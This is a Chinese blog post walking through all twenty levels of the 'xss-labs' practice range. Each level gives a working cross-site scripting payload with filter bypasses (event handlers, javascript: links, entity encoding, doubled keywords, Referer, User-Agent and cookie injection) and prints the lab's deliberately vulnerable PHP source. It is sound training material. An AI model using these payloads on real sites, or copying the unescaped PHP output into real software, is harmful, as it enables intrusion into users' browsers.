xss靶场练习(二)之xss小游戏

最新推荐文章于 2024-05-07 18:03:54 发布
最新推荐文章于 2024-05-07 18:03:54 发布
阅读量2.7k 收藏 15
点赞数 6
分类专栏: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/angry_program/article/details/104286764
版权

前言

话说自从网络安全修正法推出,  不敢轻易动国内的网站,  平时就打打靶场,  本文记录练习之路。

xss小游戏在线地址:  http://test.ctf8.com/

xss小游戏一共二十关。

为了方便,  我把项目copy在本地。

为了方便实战效果和理解,  本文采用先通关再展示源码的排版方式。

 

 

Leve-1

有一个参数name:

再看看name在html源码中的位置:

可以看到位于h2标签中,  故可以直接注入xss攻击:

http://localhost/xss_games/level1.php
?name=<script>alert(1)</script>

点击确定自动location到下一关:

  • 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level2.php?keyword=test"; 
}
</script>
<title>欢迎来到level1</title>
</head>
<body>
<h1 align=center>欢迎来到level1</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

 

 

Level-2

第二关随便输入一个搜索值:

观察在网页的生成位置:

发现输入的值在input标签中,  我们闭合input标签即可:

http://localhost/xss_games/level2.php
?keyword=hack"><script>alert(1)</script>

  • 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level3.php?writing=wait"; 
}
</script>
<title>欢迎来到level2</title>
</head>
<body>
<h1 align=center>欢迎来到level2</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

 

 

Level-3

和上一题一样,  随意输入一个值来观察情况:

继续尝试闭合绕过:

http://localhost/xss_games/level3.php
?keyword=what"><script>alert(1)</script>
&submit=搜索

发现没有闭合出去,  可能是被转义或者编码过,  

既然出不去,  那可以在input标签里加属性来xss:

http://localhost/xss_games/level3.php
?keyword=what" onfocus=alert(1)
&submit=搜索

发现还是不对....value值的双引号都没闭合出去。

这里不得其解,  看了下答案,  原来是源码中用了 htmlspecialchars()函数:  过滤一些特殊字符

  • htmlspecialchars (string, quotestyle, character-set)

把一些预定义的字符转换为 HTML 实体。

预定义的字符是:

& (和号) 成为 &amp;

" (双引号) 成为 &quot;

' (单引号) 成为 &#039;  (默认是不包括单引号的,  要打开)

< (小于) 成为 &lt;

> (大于) 成为 &gt;

其中,  quotestyle参数如下:

quotestyle

可选。规定如何编码单引号和双引号。

  • ENT_COMPAT - 默认。仅编码双引号。
  • ENT_QUOTES - 编码双引号和单引号。
  • ENT_NOQUOTES - 不编码任何引号。

所以我们用双引号闭合时,  双引号会被转义成HTML实体。

由于htmlspecialchars()函数默认状态是只过滤双引号的,  "放过"了单引号, 所以可以用单引号来闭合他:

然后发现还多出一个单引号 (至于为什么,  源码部分会解释),  我们用 // 把它注释掉:

http://localhost/xss_games/level3.php
?keyword=hack' onfocus=alert(1)//
&submit=搜索

  • 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level4.php?keyword=try harder!"; 
}
</script>
<title>欢迎来到level3</title>
</head>
<body>
<h1 align=center>欢迎来到level3</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
<center><img src=level3.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

看关键部分:  

<input name=keyword  value='".htmlspecialchars($str)."'>

可以看到,  value的值被单引号闭合起来,  至于双引号,  是通过 . (php的字符串连接符)与处理过后的str连接的,  这样才得以在前端的网页中显示出如下效果:

所以实质上我们用单引号闭合就可以往input里加属性了 (类似sql注入), 最后尾部剩下的单引号记得注释掉。

 

 

Level-4

测试一下:

继续尝试绕过闭合:

发现< >被过滤了,  这里可以往input标签里加属性使之弹窗: (这里要处理双引号闭合的问题)

http://localhost/xss_games/level4.php
?keyword=test" onfocus="alert(1)
&submit=搜索

  • 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level5.php?keyword=find a way out!"; 
}
</script>
<title>欢迎来到level4</title>
</head>
<body>
<h1 align=center>欢迎来到level4</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level4.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str3)."</h3>";
?>
</body>
</html>

可以看到,  对str3参数没有作任何过滤,  故直接注入即可。

 

 

Level-5

尝试绕过闭合,  加script标签:

发现script被替换成scr_ipt了:

然后用onerror或者onfocus事件也是被替换了,  估计是对关键字on和script做了替换

不过"条条大路通罗马",  可以用<a href=..></a>标签:

http://localhost/xss_games/level5.php
?keyword=hack"><a href=javascript:alert(1)>xss</a>
&submit=搜索

过滤规则只是匹配script,  而javascript刚好可以绕过:

  • 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level6.php?keyword=break it out!"; 
}
</script>
<title>欢迎来到level5</title>
</head>
<body>
<h1 align=center>欢迎来到level5</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level5.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str3)."</h3>";
?>
</body>
</html>

可以看到,  服务端将script和on关键字替换了。

 

 

Level-6

这关经过测试,  看到和上一关差不多,  尝试<a href=..></a>标签:

发现href被过滤了,  而且script和on关键字也是过滤的。

这里我们发现可以用大小写过滤 (可能是服务端没有进行正则式/i的匹配):

http://localhost/xss_games/level6.php
?keyword=hack"><sCript>alert(1)</Script>
&submit=搜索

  • 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level7.php?keyword=move up!"; 
}
</script>
<title>欢迎来到level6</title>
</head>
<body>
<h1 align=center>欢迎来到level6</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level6.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>";
?>
</body>
</html>

可以看到,  代码对script、on、src、data、href关键字进行了过滤,  但没有过滤大小写。

 

 

Level-7

尝试绕过双引号闭合,   然后注入script标签:

发现script标签被替换为空了,  

这里我们可以采用双写绕过:

http://localhost/xss_games/level7.php
?keyword=hack"><sscriptcript>alert(1)</scscriptript>
&submit=搜索

 

 

 

Level-8

将输入内容添加到友情链接中:

发现被替换了,  并且接下来发现其他的on、src、data、href关键字都被替换了,

双引号也被编码为html实体了:

于是尝试用html实体编码绕过:

发现script标签不能作为url解码后执行:

  • JavaScript协议:

javascript:表示执行的是 javascript脚本,  集体执行是什么就是 : 后面的代码。

这个特殊的协议类型声明了URL的主体是任意的javascript代码,它由javascript的解释器运行。

格式为,  JavaScript:URL

当浏览器装载了这样的URL时,它将执行这个URL中包含的javascript代码,并把最后一条javascript语句的字符串值作为新文档的内容显示出来。这个字符串值可以含有HTML标记,并被格式化,其显示与其他装载进浏览器的文档完全相同。

所以我们尝试JavaScript协议:

恩,  很棒,  script被替换了

继续用html实体编码绕过:  (因为JavaScript:URL的URL字符串值可以含有HTML标记,并被格式化,其显示与其他装载进浏览器的文档完全相同)

http://localhost/xss_games/level8.php
?keyword=javasc&#x72;ipt:alert(1)
&submit=添加友情链接

  • 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level9.php?keyword=not bad!"; 
}
</script>
<title>欢迎来到level8</title>
</head>
<body>
<h1 align=center>欢迎来到level8</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>
<center><img src=level8.jpg></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>

 

 

 

Level-9

发现这关和上一关差不多,  继续尝试:

发现不管怎么注入都是提示这个,  应该是采用白名单过滤了, 

我们按常理出牌:

发现注入http协议的字段可以成功,  那么我们再注入的xss语句中添加http协议就好了!

http://localhost/xss_games/level9.php
?keyword=javasc&#x72;ipt:alert(1)/* http://xss */
&submit=添加友情链接

  • 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level10.php?keyword=well done!"; 
}
</script>
<title>欢迎来到level9</title>
</head>
<body>
<h1 align=center>欢迎来到level9</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
<center><img src=level9.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>

可以看到,  源码中进行了是否包含http://字段的判断

 

 

 

Level-10

这关可以看到,  我们输入的keyword内容是在h2标题标签中的,  所以即使闭合出来也只是文本而已,  不能被解释执行:

继续观察网页源码,  发现隐藏有参数值:

于是往url加参数:

http://localhost/xss_games/level10.php
?keyword=hack&t_link=1&t_history&t_sort=3

发现只有t_sort被写入了,   所以注入点就是t_sort参数

将value闭合出去 (类似sql闭合),  然后往input标签里加onfocus就行了,  还要记得将type给显示出来:

http://localhost/xss_games/level10.php
?keyword=hack&t_sort=fuck" type="text" onfocus="alert(1)

  • 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level11.php?keyword=good job!"; 
}
</script>
<title>欢迎来到level10</title>
</head>
<body>
<h1 align=center>欢迎来到level10</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level10.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

可以明确看到,  源码的确应用了t_sort参数

 

 

 

Level-11

这关我们继续观察到有隐藏标签:

继续给url加参数,  看看哪个参数被写入:

发现还是t_sort参数,  继续闭合绕过:

看到注入的内容没有闭合出去,  应该是被转义或者实体化了,

这里可以对t_ref参数下手,  尝试抓包,  添加Referer参数:

可以看到,  注入点找到了, 并且发现没有对Referer的内容进行过滤:

  • 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level12.php?keyword=good job!"; 
}
</script>
<title>欢迎来到level11</title>
</head>
<body>
<h1 align=center>欢迎来到level11</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level11.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

源码对t_sort进行了防御,  而没有对t_ref防御。

 

 

Level-12

这关换汤不换药,  只不过注入点在User-Agent:

继续抓包修改即可:

  • 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level13.php?keyword=good job!"; 
}
</script>
<title>欢迎来到level12</title>
</head>
<body>
<h1 align=center>欢迎来到level12</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level12.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

可以看到,  通过 $_SERVER['HTTP_USER_AGENT']调用了请求头中的User-Agent信息。

 

 

Level-13

这关就是cookie的xss注入了:

抓包修改cookie绕过闭合:

  • 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level14.php"; 
}
</script>
<title>欢迎来到level13</title>
</head>
<body>
<h1 align=center>欢迎来到level13</h1>
<?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level13.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

 

 

 

 

Level-14

未修复的关卡。(要翻墙)

 

 

 

Level-15

这关比较迷,  没有什么参数传入:

观察网页源码,  发现有一个参数:

但是找不到参数值传入...

(看了源码后, ) 得知传入参数为src:

  • ng-include 指令

用于包含外部的 HTML 文件。

包含的内容将作为指定元素的子节点。

ng-include 属性的值可以是一个表达式,返回一个文件名。

默认情况下,包含的文件需要包含在同一个域名下。

  • AngularJS中的ng-include:
  1. 是否是在服务器上运行的。(注意不是服务器上,直接打开HTML文件是不行的)
  2. 文件路径是否对,如果是同一文件夹中,这样写:(注意其中的“”中间还有个‘’)
  3. ng-controller="myCtrl"是不是正确,如果没有对应的controller
  4. 组件<script src="http://apps.bdimg.com/libs/angular.js/1.4.6/angular.min.js"></script>

fath.html内容:

<head> <meta charset="utf-8"> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js"></script> </head> <body> <div ng-include="'son.html'"></div> <!-- 路径里面必须带上单引号 --> <!-- 注意:如果 ng-controller没有对应的方法,就不要写了,会报错--> </body>

son.html内容:

Hello world

当然了,  我们可以随意包含任意一关卡的php代码,  绕过利用那一关的弹窗完成这关:

http://localhost/xss_games/level15.php
?src='level1.php?name=<img src="" onerror=alert(1)>'

(由于FIrefox跳转不了,  我就用Google Chrome来pass了)

  • 源码:
<html ng-app>
<head>
        <meta charset="utf-8">
        <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js"></script>
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level16.php?keyword=test"; 
}
</script>
<title>欢迎来到level15</title>
</head>
<h1 align=center>欢迎来到第15关,自己想个办法走出去吧!</h1>
<p align=center><img src=level15.png></p>
<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>

可以看到,  传入了scr参数

 

 

 

Level-16

输入的keyword在center中间:

接着,  尝试的其他关键字都没过滤,  特殊字符也被实体化了,  (空格都不放过):

那么这里可以参考之前的blog:   SQL注入--空格绕过姿势

http://localhost/xss_games/level16.php
?keyword=<img%0asrc=""%0aonerror=alert(1)>

  • 源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level17.php?arg01=a&arg02=b"; 
}
</script>
<title>欢迎来到level16</title>
</head>
<body>
<h1 align=center>欢迎来到level16</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace("	","&nbsp;",$str4);
echo "<center>".$str5."</center>";
?>
<center><img src=level16.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str5)."</h3>";
?>
</body>
</html>

 

 

 

Level-17

由于我的Firefox版本不支持Swf插件,  所以在Google Chrome上演示:

  • <embed>标签

<embed> 标签定义了一个容器,用来嵌入外部应用或者互动程序(插件)。

embed可以用来插入各种多媒体,格式可以是 Swf、Midi、Wav、AIFF、AU、MP3等等,Netscape及新版的IE 都支持。src为音频或视频文件及其路径,可以是相对路径或绝对路径。

支持事件属性;

弹窗方式:

<embed src=level16.png onmouseover=alert(1) width=100% heigth=100%>

<embed src=1 onerror=alert(1) width=100% heigth=100%>

<embed src=son.html onmouseover=alert(1) width=100% heigth=100%>

当我们注入属性时:

然后我们就可以用onclick事件来弹窗了:

http://localhost/xss_games/level17.php
?arg01=a&arg02=b onfocus=alert(1)

  • 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!"); 
}
</script>
<title>欢迎来到level17</title>
</head>
<body>
<h1 align=center>欢迎来到level17</h1>
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
<h2 align=center>成功后,<a href=level18.php?arg01=a&arg02=b>点我进入下一关</a></h2>
</body>
</html>

 

 

 

Level-18

这关和上一关一样,  用onclick事件:

  • 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level19.php?arg01=a&arg02=b"; 
}
</script>
<title>欢迎来到level18</title>
</head>
<body>
<h1 align=center>欢迎来到level18</h1>
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf02.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
</body>
</html>

 

 

 

Level-19

这关继续注入事件:

发现需要闭合双引号出去:

很明显没有闭合成功,  可能是被转义或者HTML实体化了

这里涉及到 flash xss,  参看:  Flash XSS检测脚本的简单实现

  • 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level20.php?arg01=a&arg02=b"; 
}
</script>
<title>欢迎来到level19</title>
</head>
<body>
<h1 align=center>欢迎来到level19</h1>
<?php
ini_set("display_errors", 0);
echo '<embed src="xsf03.swf?'.htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"]).'" width=100% heigth=100%>';
?>
</body>
</html>

 

 

Level-20

也是涉及到flash xss

  • 源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level21.php?arg01=a&arg02=b"; 
}
</script>
<title>欢迎来到level20</title>
</head>
<body>
<h1 align=center>欢迎来到level20</h1>
<?php
ini_set("display_errors", 0);
echo '<embed src="xsf04.swf?'.htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"]).'" width=100% heigth=100%>';
?>
</body>
</html>

 

angry_program
关注
  • 6
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss闯关小游戏.zip
02-25
这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载
xss-labs小游戏
01-25
20关的xss游戏题,每一位xss大佬都做过哟,放在网站根目录即可纵享丝滑,快来尝试吧!
xss-labs靶场一到十关
zxcvbnm123456x的博客
06-26 794
xss靶场地址为:http://test.ctf8.com/需要先打开phpstudy才能进行练习
XSS靶场练习
zlloveyouforever的博客
04-30 709
XSS-labs靶场练习前十关 很详细的哦
XSS漏洞---XSS-labs通关教程
最新发布
zhoutong2323的博客
05-07 188
过滤源码:无pyload: 过滤源码:利用转译函数将特殊字符转译为实体字符 pyload:利用转义函数仅对get参数生效的特点,利用引号闭合value同时注入点击事件 Level-3 过滤源码:利用转译函数将特殊字符转译为实体字符 pyload:利用htmlspecialchars()函数未设置ENT_QUOTES不会对单引号过滤的特性 过滤源码:利用替换函数将get参数替换 pyload:利用href属性中可以执行JS代码的特性绕过防御
XSS-10注入靶场闯关(小游戏)——第十关
qq_39330735的博客
02-04 347
XSS-game-10隐藏入口注入,需要在源代码查找到入口的html标签,然后修改对应的属性让其显示出来。然后再注入payload
Xss游戏通关攻略带解释
sirius的博客
08-28 5455
Xss游戏通关攻略 实验环境:xss游戏源码+phpstudy 源码地址:https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 实验步骤:启动phpstudy,浏览器访问127.0.0.1/xss/后提示点击图片进入第一关。 第一关:输入的变量直接被输出,直接构造payload即可。 http://127.0.0.1/xss/level1.php?.
XSS游戏学习笔记(level 1-10)
烟敛寒林的博客
09-21 3261
XSS游戏 level 1 右键查看页面源代码 &lt;script&gt; window.alert = function() { confirm("完成的不错!"); window.location.href="level2.php?keyword=test"; } &lt;/script&gt; 即提示你要让网页弹框,修改url后面的参数 http://l...
Web安全之XSS攻击与防御小结
02-23
恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。攻击者对含有漏洞的服务器发起XSS攻击(注入JS代码)。诱使受害者打开受到攻击...
sql和xss靶场资料包.zip
12-21
bWAPP latest.zip DVWA-master.zip pikachu-master.zip sqli-labs-master.zip upload-labs-master-21.zip xss闯关小游戏.Zip xxe-lab-masteri靶场.rar PhpStudy20180211.zip vc9x86(必装).eXe vc11 x86.exe
WEB渗透学习-XSS-labs靶场
04-20
XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类型之一。它允许攻击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是一个专门针对XSS的学习平台,为网络安全从业者和新手提供了...
渗透练习-XVWA渗透测试靶场
01-26
Xtreme Vulnerable Web Application (XVWA)是一款使用PHP/MySQL编写的靶场,可以帮助初学者快速学习安全姿势巩固渗透测试知识。建议将这个靶场部署在本地服务器来提升你的能力。 指令:XVWA采用一站式安装,你可以在windows, linux 或 Mac平台下进行设置,为了能正常使用XVMA你需要按以下几个步骤配置Apache-PHP-MYSQL环境,这里我们使用的是XAMP,你也可以自己选择喜欢的集成包。 将xvwa文件复制到你的web目录,确保目录名依旧为xvwa。 配合kali效果更佳
xss-labs通关记录
m0_46571665的博客
05-23 457
目录 leve1 level2 level3 level4 level5 level6 level7 level8 level9 level10 level11 level12 level13 level14 level15 level16 level17 level18 level19 level20 leve1 观察界面可以发现,它想服务器提交一个name参数,值为test,并将结果显示在页面上,并且显示了参数值的字符长度。 查看源码 .
XSS-14、15注入靶场闯关(小游戏)——第十四、五关
qq_39330735的博客
02-04 980
XSS-15注入靶场闯关(小游戏)——第十五关,文件链接注入通关详解
XSS-GAME小游戏
weixin_43296565的博客
09-14 146
查看源代码,没有任何过滤,直接输入,弹框进入下一关。
xss-labs靶场实战全通关详细过程(xss靶场详解)
热门推荐
金 帛的博客
07-13 3万+
xss靶场一到二十关通关详细教程
自建靶场 XSS练习(一)
fanxiaoyao1的博客
03-01 961
自建靶场 XSS练习(一) 点击链接快速跳到指定关卡 文章目录自建靶场 XSS练习(一)靶场搭建一、第一关二、第二关三、第三关四、第四关五、第五关六、第六关七、第七关七、第八关九、第九关 靶场搭建 我用的是phpStudy,靶场代码可以去github上找,或者私信问我要 浏览器用的火狐,有hackbar插件,谁用谁知道 一、第一关 点击进入第一关 这关没啥难度,简单粗暴,后台也没有过滤。name=<script>alert(/xss/)</script>就过了,当然你想玩
XSS-labs 实战(练习篇)
qtttgeq的博客
02-18 228
xss Labs通关
反射型 xss靶场练习
09-27
在反射型XSS靶场练习中,可以使用以下步骤来进行练习: 1. 首先,找到一个含有反射型XSS漏洞的目标网站。 2. 在目标网站的输入框或URL参数中插入恶意代码,例如<script>alert("XSS")。 3. 提交输入或发送包含恶意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值